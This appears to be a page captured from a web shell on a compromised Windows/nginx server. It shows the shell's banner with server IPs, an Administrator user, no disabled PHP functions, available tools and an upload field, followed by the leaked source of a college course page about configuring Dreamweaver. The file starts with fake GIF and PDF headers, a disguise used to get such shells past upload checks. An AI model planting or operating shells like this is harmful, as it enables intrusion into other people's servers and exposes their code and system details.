GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Setup/Dreamweaver/ |
Upload File : |
<? // Dreamweaver/index.php $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. include('application.phpinc'); $dataFolder = formValue('dataFolder',''); $courseNumber = formValue('courseNumber',''); if ($courseNumber == '') $courseNumber = 'CSTxxxx'; if ($courseNumber != 'CSTxxxx') { $courseNumberComment = ''; } else { $courseNumberComment = ' where <b>CSTxxxx</b> is the number of the course you are taking'; } $courseTitle = formValue('courseTitle',''); $title = "Dreamweaver Configuration"; $headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title; $pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title; //$pageMenu= 'JimMartinson/Setup/Apache/Apache_Menu.phpinc'; include('common/pageHeader.phpinc'); ?> <? $sectionTitle = $title; include('common/sectionHeader.phpinc'); ?> <script type="text/javascript"> var numberForms = 2; var numberImages = 2; var pageURL = '../Setup/drive_Selected.php'; </script> <p> <ol class="instruction"> <? /** / $fileWeb_Ex = '/'.$Instructor['Name'].'/'.$courseNumber.'/Web_ExRecordings/'.$courseNumber.'_Lab01_'.str_replace(' ','_',$title).'.wrf'; #printVar('$fileWeb_Ex',$fileWeb_Ex); if (file_exists($_SERVER['DOCUMENT_ROOT'].$fileWeb_Ex)) { ?> View the <a href="<?=$fileWeb_Ex?>"><?=$title?></a> Web_Ex recording. You need to install the <a href="../Web_Ex/Web_Ex_WRF_Player_v2.9.1109.msi">Web_Ex player</a> to view the recording.<br> <? } /**/ ?> <li>We are going to use the file extension <b>.phpinc</b> for all PHP include files. <br>Dreamweaver needs to be configured so it can edit files with that extension. <br>This can be done by: <ul> <!-- <li>Viewing the Web_Ex recording of my configuration.</li>--> <li>Look at <a href="https://helpx.adobe.com/dreamweaver/kb/change-add-recognized-file-extensions.html">Dreamweaver Help / Change, add recognized file extensions | Dreamweaver</a> which was valid as of 2016.</li> <li>Search the web for how to configure Dreamweaver to recognize new file extensions.</li> </ul> </ol> <script language="javascript" type="text/javascript"> function closeWindow() { } </script> That's it for WebServices. You can <a href="javascript:window.open('','_parent','');window.close();" onclick="window.open('','_parent','');window.close();return false;">close</a> this window. </p> <? include('common/sectionFooter.phpinc'); include('common/pageFooter.phpinc'); ?>